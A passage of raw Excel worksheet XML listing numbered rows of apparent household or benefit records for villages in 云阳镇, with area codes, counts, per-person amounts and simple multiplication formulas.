      <c r="K1461" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1462" customHeight="1" spans="1:11">
      <c r="A1462" s="16" t="s">
        <v>3933</v>
      </c>
      <c r="B1462" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1462" s="17" t="s">
        <v>3581</v>
      </c>
      <c r="D1462" s="17" t="s">
        <v>3934</v>
      </c>
      <c r="E1462" s="17" t="s">
        <v>3935</v>
      </c>
      <c r="F1462" s="17" t="s">
        <v>3584</v>
      </c>
      <c r="G1462" s="17">
        <v>1</v>
      </c>
      <c r="H1462" s="18">
        <v>365</v>
      </c>
      <c r="I1462" s="17">
        <f t="shared" si="75"/>
        <v>365</v>
      </c>
      <c r="J1462" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1462" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1463" customHeight="1" spans="1:11">
      <c r="A1463" s="16" t="s">
        <v>3936</v>
      </c>
      <c r="B1463" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1463" s="17" t="s">
        <v>3937</v>
      </c>
      <c r="D1463" s="17" t="s">
        <v>3938</v>
      </c>
      <c r="E1463" s="17" t="s">
        <v>2572</v>
      </c>
      <c r="F1463" s="17" t="s">
        <v>3584</v>
      </c>
      <c r="G1463" s="17">
        <v>1</v>
      </c>
      <c r="H1463" s="18">
        <v>365</v>
      </c>
      <c r="I1463" s="17">
        <f t="shared" si="75"/>
        <v>365</v>
      </c>
      <c r="J1463" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1463" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1464" customHeight="1" spans="1:11">
      <c r="A1464" s="16" t="s">
        <v>3939</v>
      </c>
      <c r="B1464" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1464" s="17" t="s">
        <v>3595</v>
      </c>
      <c r="D1464" s="17" t="s">
        <v>3940</v>
      </c>
      <c r="E1464" s="17" t="s">
        <v>3015</v>
      </c>
      <c r="F1464" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1464" s="17">
        <v>1</v>
      </c>
      <c r="H1464" s="18">
        <v>365</v>
      </c>
      <c r="I1464" s="17">
        <f t="shared" si="75"/>
        <v>365</v>
      </c>
      <c r="J1464" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1464" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1465" customHeight="1" spans="1:11">
      <c r="A1465" s="16" t="s">
        <v>3941</v>
      </c>
      <c r="B1465" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1465" s="17" t="s">
        <v>3595</v>
      </c>
      <c r="D1465" s="17" t="s">
        <v>3942</v>
      </c>
      <c r="E1465" s="17" t="s">
        <v>3833</v>
      </c>
      <c r="F1465" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1465" s="17">
        <v>1</v>
      </c>
      <c r="H1465" s="18">
        <v>365</v>
      </c>
      <c r="I1465" s="17">
        <f t="shared" si="75"/>
        <v>365</v>
      </c>
      <c r="J1465" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1465" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1466" customHeight="1" spans="1:11">
      <c r="A1466" s="16" t="s">
        <v>3943</v>
      </c>
      <c r="B1466" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1466" s="17" t="s">
        <v>3595</v>
      </c>
      <c r="D1466" s="17" t="s">
        <v>3944</v>
      </c>
      <c r="E1466" s="17" t="s">
        <v>3945</v>
      </c>
      <c r="F1466" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1466" s="17">
        <v>2</v>
      </c>
      <c r="H1466" s="18">
        <v>325</v>
      </c>
      <c r="I1466" s="17">
        <f t="shared" si="75"/>
        <v>650</v>
      </c>
      <c r="J1466" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1466" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1467" customHeight="1" spans="1:11">
      <c r="A1467" s="16" t="s">
        <v>3946</v>
      </c>
      <c r="B1467" s="17" t="str">
        <f>B1466</f>
        <v>云阳镇</v>
      </c>
      <c r="C1467" s="17" t="str">
        <f>C1466</f>
        <v>南召店袁庄</v>
      </c>
      <c r="D1467" s="16" t="s">
        <v>3947</v>
      </c>
      <c r="E1467" s="16" t="s">
        <v>3618</v>
      </c>
      <c r="F1467" s="17" t="str">
        <f>F1466</f>
        <v>4113210519</v>
      </c>
      <c r="G1467" s="17"/>
      <c r="H1467" s="17"/>
      <c r="I1467" s="17"/>
      <c r="J1467" s="17"/>
      <c r="K1467" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1468" customHeight="1" spans="1:11">
      <c r="A1468" s="16" t="s">
        <v>3948</v>
      </c>
      <c r="B1468" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1468" s="17" t="s">
        <v>3659</v>
      </c>
      <c r="D1468" s="17" t="s">
        <v>3949</v>
      </c>
      <c r="E1468" s="17" t="s">
        <v>3614</v>
      </c>
      <c r="F1468" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1468" s="17">
        <v>1</v>
      </c>
      <c r="H1468" s="18">
        <v>365</v>
      </c>
      <c r="I1468" s="17">
        <f t="shared" ref="I1468:I1476" si="76">H1468*G1468</f>
        <v>365</v>
      </c>
      <c r="J1468" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1468" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1469" customHeight="1" spans="1:11">
      <c r="A1469" s="16" t="s">
        <v>3950</v>
      </c>
      <c r="B1469" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1469" s="17" t="s">
        <v>3572</v>
      </c>
      <c r="D1469" s="17" t="s">
        <v>3951</v>
      </c>
      <c r="E1469" s="17" t="s">
        <v>3952</v>
      </c>
      <c r="F1469" s="17" t="s">
        <v>3564</v>
      </c>
      <c r="G1469" s="17">
        <v>1</v>
      </c>
      <c r="H1469" s="18">
        <v>365</v>
      </c>
      <c r="I1469" s="17">
        <f t="shared" si="76"/>
        <v>365</v>
      </c>
      <c r="J1469" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1469" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1470" customHeight="1" spans="1:11">
      <c r="A1470" s="16" t="s">
        <v>3953</v>
      </c>
      <c r="B1470" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1470" s="17" t="s">
        <v>3609</v>
      </c>
      <c r="D1470" s="17" t="s">
        <v>3954</v>
      </c>
      <c r="E1470" s="17" t="s">
        <v>3879</v>
      </c>
      <c r="F1470" s="17" t="s">
        <v>3593</v>
      </c>
      <c r="G1470" s="17">
        <v>1</v>
      </c>
      <c r="H1470" s="18">
        <v>365</v>
      </c>
      <c r="I1470" s="17">
        <f t="shared" si="76"/>
        <v>365</v>
      </c>
      <c r="J1470" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1470" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1471" customHeight="1" spans="1:11">
      <c r="A1471" s="16" t="s">
        <v>3955</v>
      </c>
      <c r="B1471" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1471" s="17" t="s">
        <v>3635</v>
      </c>
      <c r="D1471" s="17" t="s">
        <v>3956</v>
      </c>
      <c r="E1471" s="17" t="s">
        <v>1320</v>
      </c>
      <c r="F1471" s="17" t="s">
        <v>3584</v>
      </c>
      <c r="G1471" s="17">
        <v>1</v>
      </c>
      <c r="H1471" s="18">
        <v>365</v>
      </c>
      <c r="I1471" s="17">
        <f t="shared" si="76"/>
        <v>365</v>
      </c>
      <c r="J1471" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1471" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1472" customHeight="1" spans="1:11">
      <c r="A1472" s="16" t="s">
        <v>3957</v>
      </c>
      <c r="B1472" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1472" s="17" t="s">
        <v>3595</v>
      </c>
      <c r="D1472" s="17" t="s">
        <v>3958</v>
      </c>
      <c r="E1472" s="17" t="s">
        <v>3959</v>
      </c>
      <c r="F1472" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1472" s="17">
        <v>1</v>
      </c>
      <c r="H1472" s="18">
        <v>365</v>
      </c>
      <c r="I1472" s="17">
        <f t="shared" si="76"/>
        <v>365</v>
      </c>
      <c r="J1472" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1472" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1473" customHeight="1" spans="1:11">
      <c r="A1473" s="16" t="s">
        <v>3960</v>
      </c>
      <c r="B1473" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1473" s="17" t="s">
        <v>3659</v>
      </c>
      <c r="D1473" s="17" t="s">
        <v>3961</v>
      </c>
      <c r="E1473" s="17" t="s">
        <v>3358</v>
      </c>
      <c r="F1473" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1473" s="17">
        <v>1</v>
      </c>
      <c r="H1473" s="18">
        <v>365</v>
      </c>
      <c r="I1473" s="17">
        <f t="shared" si="76"/>
        <v>365</v>
      </c>
      <c r="J1473" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1473" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1474" customHeight="1" spans="1:11">
      <c r="A1474" s="16" t="s">
        <v>3962</v>
      </c>
      <c r="B1474" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1474" s="17" t="s">
        <v>3818</v>
      </c>
      <c r="D1474" s="17" t="s">
        <v>3963</v>
      </c>
      <c r="E1474" s="17" t="s">
        <v>3886</v>
      </c>
      <c r="F1474" s="17" t="s">
        <v>3564</v>
      </c>
      <c r="G1474" s="17">
        <v>1</v>
      </c>
      <c r="H1474" s="18">
        <v>365</v>
      </c>
      <c r="I1474" s="17">
        <f t="shared" si="76"/>
        <v>365</v>
      </c>
      <c r="J1474" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1474" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1475" customHeight="1" spans="1:11">
      <c r="A1475" s="16" t="s">
        <v>3964</v>
      </c>
      <c r="B1475" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1475" s="17" t="s">
        <v>3572</v>
      </c>
      <c r="D1475" s="17" t="s">
        <v>3965</v>
      </c>
      <c r="E1475" s="17" t="s">
        <v>3583</v>
      </c>
      <c r="F1475" s="17" t="s">
        <v>3564</v>
      </c>
      <c r="G1475" s="17">
        <v>1</v>
      </c>
      <c r="H1475" s="18">
        <v>365</v>
      </c>
      <c r="I1475" s="17">
        <f t="shared" si="76"/>
        <v>365</v>
      </c>
      <c r="J1475" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1475" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1476" customHeight="1" spans="1:11">
      <c r="A1476" s="16" t="s">
        <v>3966</v>
      </c>
      <c r="B1476" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1476" s="17" t="s">
        <v>3616</v>
      </c>
      <c r="D1476" s="17" t="s">
        <v>3967</v>
      </c>
      <c r="E1476" s="17" t="s">
        <v>3601</v>
      </c>
      <c r="F1476" s="17" t="s">
        <v>3564</v>
      </c>
      <c r="G1476" s="17">
        <v>2</v>
      </c>
      <c r="H1476" s="18">
        <v>325</v>
      </c>
      <c r="I1476" s="17">
        <f t="shared" si="76"/>
        <v>650</v>
      </c>
      <c r="J1476" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1476" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1477" customHeight="1" spans="1:11">
      <c r="A1477" s="16" t="s">
        <v>3968</v>
      </c>
      <c r="B1477" s="17" t="str">
        <f>B1476</f>
        <v>云阳镇</v>
      </c>
      <c r="C1477" s="17" t="str">
        <f>C1476</f>
        <v>小关二组</v>
      </c>
      <c r="D1477" s="16" t="s">
        <v>3969</v>
      </c>
      <c r="E1477" s="16" t="s">
        <v>3583</v>
      </c>
      <c r="F1477" s="17" t="str">
        <f>F1476</f>
        <v>4113210521</v>
      </c>
      <c r="G1477" s="17"/>
      <c r="H1477" s="17"/>
      <c r="I1477" s="17"/>
      <c r="J1477" s="17"/>
      <c r="K1477" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1478" customHeight="1" spans="1:11">
      <c r="A1478" s="16" t="s">
        <v>3970</v>
      </c>
      <c r="B1478" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1478" s="17" t="s">
        <v>3616</v>
      </c>
      <c r="D1478" s="17" t="s">
        <v>3971</v>
      </c>
      <c r="E1478" s="17" t="s">
        <v>3715</v>
      </c>
      <c r="F1478" s="17" t="s">
        <v>3564</v>
      </c>
      <c r="G1478" s="17">
        <v>1</v>
      </c>
      <c r="H1478" s="18">
        <v>365</v>
      </c>
      <c r="I1478" s="17">
        <f t="shared" ref="I1478:I1486" si="77">H1478*G1478</f>
        <v>365</v>
      </c>
      <c r="J1478" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1478" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1479" customHeight="1" spans="1:11">
      <c r="A1479" s="16" t="s">
        <v>3972</v>
      </c>
      <c r="B1479" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1479" s="17" t="s">
        <v>3741</v>
      </c>
      <c r="D1479" s="17" t="s">
        <v>3973</v>
      </c>
      <c r="E1479" s="17" t="s">
        <v>3974</v>
      </c>
      <c r="F1479" s="17" t="s">
        <v>3593</v>
      </c>
      <c r="G1479" s="17">
        <v>1</v>
      </c>
      <c r="H1479" s="18">
        <v>365</v>
      </c>
      <c r="I1479" s="17">
        <f t="shared" si="77"/>
        <v>365</v>
      </c>
      <c r="J1479" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1479" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1480" customHeight="1" spans="1:11">
      <c r="A1480" s="16" t="s">
        <v>3975</v>
      </c>
      <c r="B1480" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1480" s="17" t="s">
        <v>3818</v>
      </c>
      <c r="D1480" s="17" t="s">
        <v>3976</v>
      </c>
      <c r="E1480" s="17" t="s">
        <v>3675</v>
      </c>
      <c r="F1480" s="17" t="s">
        <v>3564</v>
      </c>
      <c r="G1480" s="17">
        <v>1</v>
      </c>
      <c r="H1480" s="18">
        <v>365</v>
      </c>
      <c r="I1480" s="17">
        <f t="shared" si="77"/>
        <v>365</v>
      </c>
      <c r="J1480" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1480" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1481" customHeight="1" spans="1:11">
      <c r="A1481" s="16" t="s">
        <v>3977</v>
      </c>
      <c r="B1481" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1481" s="17" t="s">
        <v>3616</v>
      </c>
      <c r="D1481" s="17" t="s">
        <v>3978</v>
      </c>
      <c r="E1481" s="17" t="s">
        <v>3979</v>
      </c>
      <c r="F1481" s="17" t="s">
        <v>3564</v>
      </c>
      <c r="G1481" s="17">
        <v>1</v>
      </c>
      <c r="H1481" s="18">
        <v>365</v>
      </c>
      <c r="I1481" s="17">
        <f t="shared" si="77"/>
        <v>365</v>
      </c>
      <c r="J1481" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1481" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1482" customHeight="1" spans="1:11">
      <c r="A1482" s="16" t="s">
        <v>3980</v>
      </c>
      <c r="B1482" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1482" s="17" t="s">
        <v>3818</v>
      </c>
      <c r="D1482" s="17" t="s">
        <v>1612</v>
      </c>
      <c r="E1482" s="17" t="s">
        <v>3753</v>
      </c>
      <c r="F1482" s="17" t="s">
        <v>3564</v>
      </c>
      <c r="G1482" s="17">
        <v>1</v>
      </c>
      <c r="H1482" s="18">
        <v>365</v>
      </c>
      <c r="I1482" s="17">
        <f t="shared" si="77"/>
        <v>365</v>
      </c>
      <c r="J1482" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1482" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1483" customHeight="1" spans="1:11">
      <c r="A1483" s="16" t="s">
        <v>3981</v>
      </c>
      <c r="B1483" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1483" s="17" t="s">
        <v>3616</v>
      </c>
      <c r="D1483" s="17" t="s">
        <v>3982</v>
      </c>
      <c r="E1483" s="17" t="s">
        <v>3983</v>
      </c>
      <c r="F1483" s="17" t="s">
        <v>3564</v>
      </c>
      <c r="G1483" s="17">
        <v>1</v>
      </c>
      <c r="H1483" s="18">
        <v>365</v>
      </c>
      <c r="I1483" s="17">
        <f t="shared" si="77"/>
        <v>365</v>
      </c>
      <c r="J1483" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1483" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1484" customHeight="1" spans="1:11">
      <c r="A1484" s="16" t="s">
        <v>3984</v>
      </c>
      <c r="B1484" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1484" s="17" t="s">
        <v>3609</v>
      </c>
      <c r="D1484" s="17" t="s">
        <v>3985</v>
      </c>
      <c r="E1484" s="17" t="s">
        <v>3986</v>
      </c>
      <c r="F1484" s="17" t="s">
        <v>3593</v>
      </c>
      <c r="G1484" s="17">
        <v>1</v>
      </c>
      <c r="H1484" s="18">
        <v>365</v>
      </c>
      <c r="I1484" s="17">
        <f t="shared" si="77"/>
        <v>365</v>
      </c>
      <c r="J1484" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1484" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1485" customHeight="1" spans="1:11">
      <c r="A1485" s="16" t="s">
        <v>3987</v>
      </c>
      <c r="B1485" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1485" s="17" t="s">
        <v>3988</v>
      </c>
      <c r="D1485" s="17" t="s">
        <v>3989</v>
      </c>
      <c r="E1485" s="17" t="s">
        <v>3657</v>
      </c>
      <c r="F1485" s="17" t="s">
        <v>3584</v>
      </c>
      <c r="G1485" s="17">
        <v>1</v>
      </c>
      <c r="H1485" s="18">
        <v>365</v>
      </c>
      <c r="I1485" s="17">
        <f t="shared" si="77"/>
        <v>365</v>
      </c>
      <c r="J1485" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1485" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1486" customHeight="1" spans="1:11">
      <c r="A1486" s="16" t="s">
        <v>3990</v>
      </c>
      <c r="B1486" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1486" s="17" t="s">
        <v>3572</v>
      </c>
      <c r="D1486" s="17" t="s">
        <v>3991</v>
      </c>
      <c r="E1486" s="17" t="s">
        <v>3992</v>
      </c>
      <c r="F1486" s="17" t="s">
        <v>3564</v>
      </c>
      <c r="G1486" s="17">
        <v>2</v>
      </c>
      <c r="H1486" s="18">
        <v>325</v>
      </c>
      <c r="I1486" s="17">
        <f t="shared" si="77"/>
        <v>650</v>
      </c>
      <c r="J1486" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1486" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1487" customHeight="1" spans="1:11">
      <c r="A1487" s="16" t="s">
        <v>3993</v>
      </c>
      <c r="B1487" s="17" t="str">
        <f>B1486</f>
        <v>云阳镇</v>
      </c>
      <c r="C1487" s="17" t="str">
        <f>C1486</f>
        <v>小关四组</v>
      </c>
      <c r="D1487" s="23" t="s">
        <v>3994</v>
      </c>
      <c r="E1487" s="27" t="s">
        <v>3995</v>
      </c>
      <c r="F1487" s="17" t="str">
        <f>F1486</f>
        <v>4113210521</v>
      </c>
      <c r="G1487" s="17"/>
      <c r="H1487" s="17"/>
      <c r="I1487" s="17"/>
      <c r="J1487" s="17"/>
      <c r="K1487" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1488" customHeight="1" spans="1:11">
      <c r="A1488" s="16" t="s">
        <v>3996</v>
      </c>
      <c r="B1488" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1488" s="17" t="s">
        <v>3997</v>
      </c>
      <c r="D1488" s="17" t="s">
        <v>3998</v>
      </c>
      <c r="E1488" s="17" t="s">
        <v>3651</v>
      </c>
      <c r="F1488" s="17" t="s">
        <v>3564</v>
      </c>
      <c r="G1488" s="17">
        <v>1</v>
      </c>
      <c r="H1488" s="18">
        <v>365</v>
      </c>
      <c r="I1488" s="17">
        <f t="shared" ref="I1488:I1493" si="78">H1488*G1488</f>
        <v>365</v>
      </c>
      <c r="J1488" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1488" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1489" customHeight="1" spans="1:11">
      <c r="A1489" s="16" t="s">
        <v>3999</v>
      </c>
      <c r="B1489" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1489" s="17" t="s">
        <v>4000</v>
      </c>
      <c r="D1489" s="17" t="s">
        <v>4001</v>
      </c>
      <c r="E1489" s="17" t="s">
        <v>4002</v>
      </c>
      <c r="F1489" s="17" t="s">
        <v>3584</v>
      </c>
      <c r="G1489" s="17">
        <v>1</v>
      </c>
      <c r="H1489" s="18">
        <v>365</v>
      </c>
      <c r="I1489" s="17">
        <f t="shared" si="78"/>
        <v>365</v>
      </c>
      <c r="J1489" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1489" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1490" customHeight="1" spans="1:11">
      <c r="A1490" s="16" t="s">
        <v>4003</v>
      </c>
      <c r="B1490" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1490" s="17" t="s">
        <v>4004</v>
      </c>
      <c r="D1490" s="17" t="s">
        <v>4005</v>
      </c>
      <c r="E1490" s="17" t="s">
        <v>3015</v>
      </c>
      <c r="F1490" s="17" t="s">
        <v>3584</v>
      </c>
      <c r="G1490" s="17">
        <v>1</v>
      </c>
      <c r="H1490" s="18">
        <v>365</v>
      </c>
      <c r="I1490" s="17">
        <f t="shared" si="78"/>
        <v>365</v>
      </c>
      <c r="J1490" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1490" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1491" customHeight="1" spans="1:11">
      <c r="A1491" s="16" t="s">
        <v>4006</v>
      </c>
      <c r="B1491" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1491" s="17" t="s">
        <v>4004</v>
      </c>
      <c r="D1491" s="17" t="s">
        <v>4007</v>
      </c>
      <c r="E1491" s="17" t="s">
        <v>1320</v>
      </c>
      <c r="F1491" s="17" t="s">
        <v>3584</v>
      </c>
      <c r="G1491" s="17">
        <v>1</v>
      </c>
      <c r="H1491" s="18">
        <v>365</v>
      </c>
      <c r="I1491" s="17">
        <f t="shared" si="78"/>
        <v>365</v>
      </c>
      <c r="J1491" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1491" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1492" customHeight="1" spans="1:11">
      <c r="A1492" s="16" t="s">
        <v>4008</v>
      </c>
      <c r="B1492" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1492" s="17" t="s">
        <v>4009</v>
      </c>
      <c r="D1492" s="17" t="s">
        <v>4010</v>
      </c>
      <c r="E1492" s="17" t="s">
        <v>3833</v>
      </c>
      <c r="F1492" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1492" s="17">
        <v>1</v>
      </c>
      <c r="H1492" s="18">
        <v>365</v>
      </c>
      <c r="I1492" s="17">
        <f t="shared" si="78"/>
        <v>365</v>
      </c>
      <c r="J1492" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1492" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1493" customHeight="1" spans="1:11">
      <c r="A1493" s="16" t="s">
        <v>4011</v>
      </c>
      <c r="B1493" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1493" s="17" t="s">
        <v>3997</v>
      </c>
      <c r="D1493" s="17" t="s">
        <v>4012</v>
      </c>
      <c r="E1493" s="17" t="s">
        <v>3907</v>
      </c>
      <c r="F1493" s="17" t="s">
        <v>3564</v>
      </c>
      <c r="G1493" s="17">
        <v>3</v>
      </c>
      <c r="H1493" s="18">
        <v>355</v>
      </c>
      <c r="I1493" s="17">
        <f t="shared" si="78"/>
        <v>1065</v>
      </c>
      <c r="J1493" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1493" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1494" customHeight="1" spans="1:11">
      <c r="A1494" s="16" t="s">
        <v>4013</v>
      </c>
      <c r="B1494" s="17" t="str">
        <f>B1493</f>
        <v>云阳镇</v>
      </c>
      <c r="C1494" s="17" t="str">
        <f>C1493</f>
        <v>云阳小关</v>
      </c>
      <c r="D1494" s="16" t="s">
        <v>4014</v>
      </c>
      <c r="E1494" s="16" t="s">
        <v>4015</v>
      </c>
      <c r="F1494" s="17" t="str">
        <f>F1493</f>
        <v>4113210521</v>
      </c>
      <c r="G1494" s="17"/>
      <c r="H1494" s="17"/>
      <c r="I1494" s="17"/>
      <c r="J1494" s="17"/>
      <c r="K1494" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1495" customHeight="1" spans="1:11">
      <c r="A1495" s="16" t="s">
        <v>4016</v>
      </c>
      <c r="B1495" s="17" t="str">
        <f>B1494</f>
        <v>云阳镇</v>
      </c>
      <c r="C1495" s="17" t="str">
        <f>C1494</f>
        <v>云阳小关</v>
      </c>
      <c r="D1495" s="45" t="s">
        <v>4017</v>
      </c>
      <c r="E1495" s="45" t="s">
        <v>4018</v>
      </c>
      <c r="F1495" s="17" t="str">
        <f>F1494</f>
        <v>4113210521</v>
      </c>
      <c r="G1495" s="17"/>
      <c r="H1495" s="17"/>
      <c r="I1495" s="17"/>
      <c r="J1495" s="17"/>
      <c r="K1495" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1496" customHeight="1" spans="1:11">
      <c r="A1496" s="16" t="s">
        <v>4019</v>
      </c>
      <c r="B1496" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1496" s="17" t="s">
        <v>4020</v>
      </c>
      <c r="D1496" s="17" t="s">
        <v>4021</v>
      </c>
      <c r="E1496" s="17" t="s">
        <v>3607</v>
      </c>
      <c r="F1496" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1496" s="17">
        <v>1</v>
      </c>
      <c r="H1496" s="18">
        <v>365</v>
      </c>
      <c r="I1496" s="17">
        <f>H1496*G1496</f>
        <v>365</v>
      </c>
      <c r="J1496" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1496" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1497" customHeight="1" spans="1:11">
      <c r="A1497" s="16" t="s">
        <v>4022</v>
      </c>
      <c r="B1497" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1497" s="17" t="s">
        <v>3590</v>
      </c>
      <c r="D1497" s="17" t="s">
        <v>4023</v>
      </c>
      <c r="E1497" s="17" t="s">
        <v>3753</v>
      </c>
      <c r="F1497" s="17" t="s">
        <v>3593</v>
      </c>
      <c r="G1497" s="17">
        <v>1</v>
      </c>
      <c r="H1497" s="18">
        <v>365</v>
      </c>
      <c r="I1497" s="17">
        <f>H1497*G1497</f>
        <v>365</v>
      </c>
      <c r="J1497" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1497" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1498" customHeight="1" spans="1:11">
      <c r="A1498" s="16" t="s">
        <v>4024</v>
      </c>
      <c r="B1498" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1498" s="17" t="s">
        <v>3741</v>
      </c>
      <c r="D1498" s="17" t="s">
        <v>4025</v>
      </c>
      <c r="E1498" s="17" t="s">
        <v>4026</v>
      </c>
      <c r="F1498" s="17" t="s">
        <v>3593</v>
      </c>
      <c r="G1498" s="17">
        <v>2</v>
      </c>
      <c r="H1498" s="18">
        <v>335</v>
      </c>
      <c r="I1498" s="17">
        <f>H1498*G1498</f>
        <v>670</v>
      </c>
      <c r="J1498" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1498" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1499" customHeight="1" spans="1:11">
      <c r="A1499" s="16" t="s">
        <v>4027</v>
      </c>
      <c r="B1499" s="17" t="str">
        <f>B1498</f>
        <v>云阳镇</v>
      </c>
      <c r="C1499" s="17" t="str">
        <f>C1498</f>
        <v>老城二组</v>
      </c>
      <c r="D1499" s="24" t="s">
        <v>4028</v>
      </c>
      <c r="E1499" s="24" t="s">
        <v>1640</v>
      </c>
      <c r="F1499" s="17" t="str">
        <f>F1498</f>
        <v>4113210523</v>
      </c>
      <c r="G1499" s="17"/>
      <c r="H1499" s="17"/>
      <c r="I1499" s="17"/>
      <c r="J1499" s="17"/>
      <c r="K1499" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1500" customHeight="1" spans="1:11">
      <c r="A1500" s="16" t="s">
        <v>4029</v>
      </c>
      <c r="B1500" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1500" s="17" t="s">
        <v>3818</v>
      </c>
      <c r="D1500" s="17" t="s">
        <v>4030</v>
      </c>
      <c r="E1500" s="17" t="s">
        <v>3833</v>
      </c>
      <c r="F1500" s="17" t="s">
        <v>3564</v>
      </c>
      <c r="G1500" s="17">
        <v>1</v>
      </c>
      <c r="H1500" s="18">
        <v>365</v>
      </c>
